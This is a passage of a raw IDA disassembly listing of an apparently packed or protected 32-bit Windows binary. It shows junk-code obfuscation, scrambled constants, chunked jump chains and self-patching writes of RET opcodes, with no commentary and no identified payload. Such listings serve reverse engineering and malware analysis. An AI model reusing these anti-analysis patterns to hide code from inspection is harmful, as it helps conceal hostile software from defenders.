cmp eax, 0D84A4184h
jmp loc_44324A
; END OF FUNCTION CHUNK FOR sub_442B3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_262. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_443B05: ; CODE XREF: ut7h7i2x:0044743Dj
jmp locret_447A6C
; ---------------------------------------------------------------------------
loc_443B0A: ; CODE XREF: ut7h7i2x:00439A2Dj
jmp loc_44028E
; ---------------------------------------------------------------------------
sbb edi, esi
jmp sub_445F20
; ---------------------------------------------------------------------------
loc_443B16: ; DATA XREF: ut7h7i2x:00447A53o
push edi
pushf
push 0DF366709h
pop edi
rol edi, 0Ah
and edi, 2559A90Eh
add edi, 0D7E41272h
jmp loc_44C12A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E700
loc_443B32: ; CODE XREF: sub_43E700:loc_44A4D6j
jnz loc_44E1F6
; END OF FUNCTION CHUNK FOR sub_43E700
; START OF FUNCTION CHUNK FOR sub_442E16
loc_443B38: ; CODE XREF: sub_442E16+6j
jmp loc_44A7EA
; END OF FUNCTION CHUNK FOR sub_442E16
; ---------------------------------------------------------------------------
mov eax, [ebx]
jmp loc_44B2AE
; ---------------------------------------------------------------------------
loc_443B44: ; CODE XREF: ut7h7i2x:00447A07j
ja loc_443A24
; START OF FUNCTION CHUNK FOR sub_449700
loc_443B4A: ; CODE XREF: sub_449700+10j
add esi, 0BEAF323Ch
xchg esi, [esp+0]
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
test esi, ebx
jmp loc_447EAF
; ---------------------------------------------------------------------------
loc_443B5F: ; DATA XREF: sub_44BCCB-A3B1o
mov eax, [ebp-10h]
mov eax, [eax+64h]
add eax, [ebp-14h]
cmp eax, [ebp-0Ch]
call sub_44D406
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_443B70: ; CODE XREF: sub_4518D7-F90Bj
jmp loc_443C8C
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
loc_443B75: ; CODE XREF: ut7h7i2x:loc_44C029j
jz loc_43D729
loc_443B7B: ; CODE XREF: ut7h7i2x:004508BAj
jmp loc_43A094
; ---------------------------------------------------------------------------
test edx, 6E6763CDh
jmp loc_43A156
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_443B8B: ; CODE XREF: sub_449E96:loc_45675Dj
or edi, 28D3139Ah
add edi, 474C931Fh
xchg edi, [esp+0]
jmp loc_45A1A8
; END OF FUNCTION CHUNK FOR sub_449E96
; =============== S U B R O U T I N E =======================================
sub_443B9F proc near ; CODE XREF: sub_439BD1+1191Bp
; ut7h7i2x:0045535Bj
; FUNCTION CHUNK AT 00454C36 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
pop ecx
xor eax, eax
jmp loc_454C36
sub_443B9F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_443BAB: ; CODE XREF: ut7h7i2x:004476BDj
xor esi, 23A2BA97h
sub esi, 0FDF79669h
add esi, 2FE558A7h
xchg esi, [esp]
jmp loc_4453BF
; =============== S U B R O U T I N E =======================================
sub_443BC5 proc near ; DATA XREF: sub_43FE13+7o
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043E365 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004402B6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004404CC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044200A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445106 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447EE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B025 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044C72B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB53 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044DB65 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E6CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EA0E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450B3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450EF6 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004531B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004534B2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453719 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C6D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454346 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B0C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455B1E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004563D7 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 004575EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A1BC SIZE 00000007 BYTES
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
mov [ebp-4], eax
push 4FBFBD27h
pop eax
jmp loc_44B025
sub_443BC5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_443BD9 proc near ; DATA XREF: sub_458007+5o
; FUNCTION CHUNK AT 0043DAD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004531E6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004599A7 SIZE 00000005 BYTES
push 5CC9633Bh
pop edi
rol edi, 8
add edi, 783D81F7h
and edi, 0D7FA18D0h
or edi, 41EA81BAh
add edi, 6BECD94Dh
add edi, ebp
jmp loc_4599A7
sub_443BD9 endp
; ---------------------------------------------------------------------------
loc_443C01: ; DATA XREF: sub_43CCC3+1A6EDo
mov eax, [ebp-104h]
cmp byte ptr [eax], 0
jnz loc_43F936
jmp loc_43A1BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_443C15: ; CODE XREF: sub_44EC11-10380j
rol eax, 1Bh
xor eax, 0B698F8A3h
loc_443C1E: ; CODE XREF: ut7h7i2x:00453AC8j
add eax, ebp
add eax, 14C23EA6h
mov eax, [eax]
jmp loc_447562
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_443C2D: ; CODE XREF: sub_449EE1:loc_4461AAj
xchg esi, [esp+0]
call sub_457A66
mov eax, 320057C2h
call sub_43AED9
mov ds:off_41D018, eax
jmp loc_4449FE
; END OF FUNCTION CHUNK FOR sub_449EE1
; =============== S U B R O U T I N E =======================================
sub_443C4A proc near ; CODE XREF: sub_455807+2406p
; ut7h7i2x:0045A437j
; FUNCTION CHUNK AT 0043A671 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043BEE5 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004402D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A6D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444DC1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044DBCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FD36 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451611 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045643A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045699E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004578E9 SIZE 0000000B BYTES
xchg ecx, [esp+0]
pop ecx
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_45643A
sub_443C4A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_443C59: ; CODE XREF: ut7h7i2x:00459BBBj
jns loc_44E79A
jge loc_44869D
; START OF FUNCTION CHUNK FOR sub_451971
loc_443C65: ; CODE XREF: sub_451971:loc_459BA8j
or edi, 38E70EE4h
add edi, 844D7554h
jmp loc_449F7D
; END OF FUNCTION CHUNK FOR sub_451971
; ---------------------------------------------------------------------------
xor esi, 0FCE5E14Ah
jmp sub_443AB3
; ---------------------------------------------------------------------------
locret_443C81: ; CODE XREF: ut7h7i2x:loc_44A671j
retn
; ---------------------------------------------------------------------------
loc_443C82: ; CODE XREF: ut7h7i2x:00457D37j
jmp loc_444766
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_443C87: ; CODE XREF: sub_455111-4C6Cj
jmp loc_454286
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_443C8C: ; CODE XREF: sub_4518D7:loc_443B70j
xchg esi, [esp-4+arg_0]
jmp loc_457693
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
db 9, 0C0h
; ---------------------------------------------------------------------------
jmp loc_453431
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_443C9B: ; CODE XREF: sub_43AA94j
mov edx, ds:dword_458530
or edx, edx
jnz loc_458521
jmp loc_44DA1B
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_443CAE: ; CODE XREF: sub_457A0D+Dj
jnz loc_44F44F
jmp loc_454F81
; END OF FUNCTION CHUNK FOR sub_457A0D
; ---------------------------------------------------------------------------
loc_443CB9: ; CODE XREF: ut7h7i2x:00457502j
shr edi, 6
loc_443CBC: ; CODE XREF: ut7h7i2x:loc_43B09Dj
push eax
push 2C49AEA8h
pop eax
jmp loc_45986C
; =============== S U B R O U T I N E =======================================
sub_443CC8 proc near ; CODE XREF: ut7h7i2x:00451D9Cj
; sub_459111p
xchg eax, [esp+0]
pop eax
call sub_443CE1
jmp ds:off_41D024
sub_443CC8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_443CD7: ; CODE XREF: sub_457A66-48F4j
jmp nullsub_307
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_443CDC: ; CODE XREF: ut7h7i2x:0043F9B4j
jmp locret_4483FA
; =============== S U B R O U T I N E =======================================
sub_443CE1 proc near ; CODE XREF: sub_443CC8+4p
; sub_4408DB:loc_443ED3j ...
; FUNCTION CHUNK AT 0045A9C5 SIZE 00000005 BYTES
push offset loc_44AE3F
jmp loc_45A9C5
sub_443CE1 endp
; ---------------------------------------------------------------------------
loc_443CEB: ; CODE XREF: ut7h7i2x:loc_444F96j
pop edx
or ecx, 79AFC1E7h
xor ecx, 0A64BC73Dh
add eax, ecx
jmp loc_43F5A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447917
loc_443CFF: ; CODE XREF: sub_447917:loc_447922j
jl loc_457639
push 903F55C5h
jmp loc_457633
; END OF FUNCTION CHUNK FOR sub_447917
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_443D0F: ; CODE XREF: sub_43CA2D+6674j
sbb ebp, edx
push ebp
loc_443D12: ; CODE XREF: sub_4508DB:loc_440C86j
; sub_43CA2D:loc_446236j ...
jmp loc_44FFA4
; ---------------------------------------------------------------------------
loc_443D17: ; CODE XREF: sub_43CA2D+EB49j
; sub_45410C+257Dj
call sub_4453B5
loc_443D1C: ; CODE XREF: ut7h7i2x:004572C3j
cdq
jnb loc_45739B
and ecx, 494ED86Ah
and edi, ebx
jmp loc_449FE3
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
and edi, 80718DA0h
jmp loc_439F50
; =============== S U B R O U T I N E =======================================
sub_443D3B proc near ; DATA XREF: ut7h7i2x:0045343Bo
push ebx
push 95FB6338h
pop ebx
rol ebx, 1Eh
call sub_456640
sub_443D3B endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_443D4A: ; CODE XREF: sub_459E7A-10DBj
jmp nullsub_411
; END OF FUNCTION CHUNK FOR sub_459E7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_443D4F: ; CODE XREF: sub_452361-A6BCj
jmp sub_4508DB
; END OF FUNCTION CHUNK FOR sub_452361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_443D54: ; CODE XREF: sub_43A513+EBBCj
call sub_457565
pop ecx
jmp loc_44BBCF
; ---------------------------------------------------------------------------
loc_443D5F: ; CODE XREF: sub_43A513:loc_43A51Aj
test byte ptr [ebp-8], 2
jz loc_44BBD2
push ebp
mov eax, [ebp-20h]
call sub_457565
jmp loc_4478CB
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_443D77: ; CODE XREF: sub_44DF79+4E92j
jo sub_44BCCB
and esi, ecx
loc_443D7F: ; CODE XREF: sub_44DF79:loc_44BDDFj
mov eax, 3CFDF720h
call sub_43AED9
push esi
mov esi, edi
push offset loc_442D5C
jmp nullsub_107
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_443D96: ; CODE XREF: sub_43F0B0+1581Aj
pop ebx
or ebx, 24F53752h
add ebx, 50472797h
xchg ebx, [esp-8+arg_4]
jmp sub_43F3D1
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
loc_443DAB: ; CODE XREF: ut7h7i2x:loc_441134j
js loc_4442D5
sbb edx, 0A32E8710h
jmp loc_44ACAE
; ---------------------------------------------------------------------------
loc_443DBC: ; CODE XREF: ut7h7i2x:0043FB4Ej
jz loc_44E885
push 70D2031Dh
jmp loc_44E87D
; =============== S U B R O U T I N E =======================================
sub_443DCC proc near ; CODE XREF: sub_442670+7j
add esp, 0FFFFFFF8h
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
push offset sub_443666
jmp nullsub_50
sub_443DCC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_443DE0: ; CODE XREF: sub_43FCEE:loc_43DDFEj
push 0DB63F8CCh
js loc_44F38D
push ebx
jmp loc_445978
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
locret_443DF1: ; CODE XREF: ut7h7i2x:00448A12j
retn
; ---------------------------------------------------------------------------
loc_443DF2: ; CODE XREF: ut7h7i2x:004521F3j
jmp loc_45924A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_443DF7: ; CODE XREF: sub_43A556+153DBj
mov edx, eax
xchg edx, [esp+4+var_4]
call sub_442872
push offset loc_450D20
jmp loc_4567C9
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
jnb loc_43DC88
jmp sub_450365
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_443E16: ; CODE XREF: sub_44D5BE+4j
pop edx
mov eax, [esp-4+arg_0]
push ecx
loc_443E1B: ; CODE XREF: ut7h7i2x:00453915j
mov ecx, edx
call sub_44E3FD
loc_443E22: ; CODE XREF: ut7h7i2x:loc_44E709j
; ut7h7i2x:00458340j
jmp loc_452FF7
; END OF FUNCTION CHUNK FOR sub_44D5BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_233. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_443E28: ; CODE XREF: sub_4469B9+13BC3j
jmp loc_44E8BD
; END OF FUNCTION CHUNK FOR sub_4469B9
; =============== S U B R O U T I N E =======================================
sub_443E2D proc near ; CODE XREF: sub_43CA2D+6p
; ut7h7i2x:00459E6Fj
; FUNCTION CHUNK AT 0043BFB8 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, esp
push ecx
push offset loc_453C01
jmp loc_43BFB8
sub_443E2D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_443E3F: ; CODE XREF: sub_452D3D+Cj
call sub_44445F
loc_443E44: ; CODE XREF: sub_444266:loc_444998j
jmp loc_43AC53
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_443E49: ; CODE XREF: sub_4589C7-71C9j
push offset sub_4557A5
jmp loc_4391C0
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
loc_443E53: ; CODE XREF: ut7h7i2x:loc_4555F6j
jz loc_44A850
jmp loc_459FC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_443E5E: ; CODE XREF: sub_4433C5+9849j
jz loc_4445CF
jmp loc_43F736
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
loc_443E69: ; DATA XREF: sub_44458B+10o
mov byte ptr [eax], 0C3h
jmp loc_4513FD
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push edx
call sub_44A833
jmp loc_458932
; ---------------------------------------------------------------------------
rol edx, 0Bh
jmp sub_458CA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454466
loc_443E88: ; CODE XREF: sub_454466:loc_4472F8j
sub ecx, 27BAD4EBh
and ecx, 9E71CA78h
xor ecx, 0C1739561h
xor eax, ecx
pop ecx
jmp sub_44F852
; END OF FUNCTION CHUNK FOR sub_454466
; ---------------------------------------------------------------------------
mov eax, 1AABF86Ch
push ebx
push 57EFBBDCh
pop ebx
rol ebx, 2
sub ebx, 0BE7E3512h
jmp loc_445E24
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44640F
loc_443EBC: ; CODE XREF: sub_44640F+10j
jnz loc_44C488
jmp loc_4399D8
; END OF FUNCTION CHUNK FOR sub_44640F
; ---------------------------------------------------------------------------
adc esi, 9A22E22Fh
jmp sub_44ADF9
; ---------------------------------------------------------------------------
locret_443ED2: ; CODE XREF: ut7h7i2x:00458DDFj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408DB
loc_443ED3: ; CODE XREF: sub_4408DB+13733j
jmp sub_443CE1
; END OF FUNCTION CHUNK FOR sub_4408DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44339F
loc_443ED8: ; CODE XREF: sub_44339F+Fj
jmp loc_43F300
; END OF FUNCTION CHUNK FOR sub_44339F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_443EDD: ; CODE XREF: sub_4503C3-14991j
jmp loc_4483D0
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_443EE2: ; CODE XREF: sub_4544E6+254j
test edi, edx
jmp loc_44F906
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
loc_443EE9: ; CODE XREF: ut7h7i2x:00447624j
cmp ecx, 9142D69Eh
jmp loc_45968C
; ---------------------------------------------------------------------------
jmp ds:off_41D038
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44697F
loc_443EFA: ; CODE XREF: sub_4562F0-CB49j
; sub_44697F+A6B5j ...
call sub_43FA50
loc_443EFF: ; CODE XREF: sub_439BF8+156ADj
sbb edx, ebp
loc_443F01: ; CODE XREF: sub_44BF76:loc_44ABFAj
push 431A9587h
pop eax
add eax, 6B667B58h
or eax, 7E289816h
rol eax, 4
add eax, 23DAEDDh
call sub_441C0E
sbb edi, ebp
loc_443F23: ; CODE XREF: ut7h7i2x:00457D4Cj
push 0C519B81Fh
jmp sub_457E3D
; END OF FUNCTION CHUNK FOR sub_44697F
; ---------------------------------------------------------------------------
pushf
adc edx, ecx
jmp sub_440B8A
; ---------------------------------------------------------------------------
loc_443F35: ; DATA XREF: ut7h7i2x:00451D32o
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-7], 10h
jz loc_447EF4
jmp loc_4534FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_443F4A: ; CODE XREF: sub_442B3B+1684Dj
cmp esi, 0CBC1DD0Eh
jmp loc_43F373
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_443F55: ; CODE XREF: sub_456F1D:loc_43AEB9j
jnz loc_452B03
jmp loc_45A296
; END OF FUNCTION CHUNK FOR sub_456F1D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_443F61: ; CODE XREF: sub_449808:loc_43FB68j
jmp loc_43A75B
; END OF FUNCTION CHUNK FOR sub_449808
; =============== S U B R O U T I N E =======================================
sub_443F66 proc near ; DATA XREF: sub_43C969+3o
push 84BF0D20h
pop esi
xor esi, 9C8B2EDAh
add esi, 0E80FECF6h
xchg esi, [esp+0]
jmp loc_456CF6
sub_443F66 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_443F80: ; CODE XREF: sub_4529E0-3EC3j
cmp ebp, 0F78F538h
jmp loc_449258
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_443F8B: ; CODE XREF: sub_43BE93+111CEj
jnz loc_449350
jmp loc_44EC8D
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
pop edx
pop eax
mov ds:dword_443FA8, edx
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_443F9E: ; CODE XREF: sub_43AED9+Ej
; sub_43AED9+425Aj
xchg eax, edx
call sub_44ED9F
retn
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
db 4, 8Bh, 0F2h
dword_443FA8 dd 0 ; DATA XREF: sub_43AED9+6r
; ut7h7i2x:00443F98w
; ---------------------------------------------------------------------------
loc_443FAC: ; CODE XREF: ut7h7i2x:00444688j
jmp loc_44CFED
; ---------------------------------------------------------------------------
loc_443FB1: ; CODE XREF: ut7h7i2x:004532C2j
jns loc_43DC6F
; =============== S U B R O U T I N E =======================================
sub_443FB7 proc near ; CODE XREF: sub_455AD6-18527p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044D1C4 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov byte ptr [eax], 0C3h
jmp loc_44D1C4
sub_443FB7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_443FC3 proc near ; CODE XREF: sub_43AE1A:loc_43BFAEp
; ut7h7i2x:004455DFj
; FUNCTION CHUNK AT 00445259 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446F0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004484C1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448DCD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B31C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452B44 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jmp loc_452B44
sub_443FC3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shr ecx, 0Bh
or ebx, edx
jmp sub_44B68F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452AE2
loc_443FDC: ; CODE XREF: sub_452AE2:loc_45877Fj
mov ecx, eax
xchg ecx, [esp+0]
call sub_43BA59
call sub_44D1F0
; END OF FUNCTION CHUNK FOR sub_452AE2
; START OF FUNCTION CHUNK FOR sub_451039
loc_443FEB: ; CODE XREF: sub_451039-75B8j
jmp loc_453047
; END OF FUNCTION CHUNK FOR sub_451039
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_443FF0: ; CODE XREF: sub_439BF8+8B13j
jmp loc_45237D
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
jmp ds:dword_41D0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450D13
loc_443FFB: ; CODE XREF: sub_450D13+8j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_450D13
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jnb loc_43D146
mov eax, [esp]
call sub_456944
loc_44400F: ; CODE XREF: ut7h7i2x:0044D538j
jmp locret_448ABA
; ---------------------------------------------------------------------------
loc_444014: ; CODE XREF: ut7h7i2x:00448F15j
jmp loc_453117
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4414CC
loc_444019: ; CODE XREF: sub_4414CC+17j
jmp nullsub_553
; END OF FUNCTION CHUNK FOR sub_4414CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_44401E: ; CODE XREF: sub_450FDE-15EF7j
jmp loc_441FF3
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_444023: ; CODE XREF: ut7h7i2x:0044E417j
adc ebx, 2A1DF69Dh
; =============== S U B R O U T I N E =======================================
sub_444029 proc near ; CODE XREF: sub_44B72F:loc_454A71p
; FUNCTION CHUNK AT 0043B68A SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043CB55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D194 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E531 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043E69C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004402C3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440512 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004424C0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444967 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445436 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445D9A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044A6E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA76 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044ADA0 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044B7C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CF06 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044E0AD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F67E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450420 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004507F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B12 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453F7A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045461C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B19 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454E9D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456812 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456BC7 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00457795 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459EA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A308 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add edx, 20AE82F1h
jmp loc_44A6E8
sub_444029 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_444038 proc near ; DATA XREF: sub_4589FE-1BF29o
add edx, 6C0CE795h
add edx, ebp
add edx, 8EEA3769h
mov [edx], eax
call sub_445E9E
loc_44404D: ; CODE XREF: sub_439D16:loc_4471EAj
jmp nullsub_23
sub_444038 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_444052: ; CODE XREF: sub_45633E-EFE4j
test ebx, 0BC7326B7h
jmp loc_450DE1
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_44405D: ; CODE XREF: sub_4529E0-C7EDj
add eax, 0D7B6AE24h
push eax
push esi
push offset loc_4452FC
jmp sub_453177
; END OF FUNCTION CHUNK FOR sub_4529E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_413. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_444070: ; CODE XREF: sub_447EB5+6B6Bj
jmp loc_43CB44
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_444075: ; CODE XREF: sub_444851-11AFj
jmp loc_447DF8
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
loc_44407A: ; CODE XREF: ut7h7i2x:004571A3j
test ecx, ebp
jmp loc_453D90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447E29
loc_444081: ; CODE XREF: sub_447E29:loc_4502BCj
jge loc_44902C
test edi, 0DAE2344Ah
jmp loc_449020
; END OF FUNCTION CHUNK FOR sub_447E29
; ---------------------------------------------------------------------------
loc_444092: ; CODE XREF: ut7h7i2x:loc_44E24Dj
rol ebx, 15h
cmp ebx, 0B095BD8Ch
jmp loc_44545D
; ---------------------------------------------------------------------------
loc_4440A0: ; CODE XREF: ut7h7i2x:00441B21j
jnz loc_444D16
jmp loc_43ACE9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_377. PRESS KEYPAD "+" TO EXPAND]
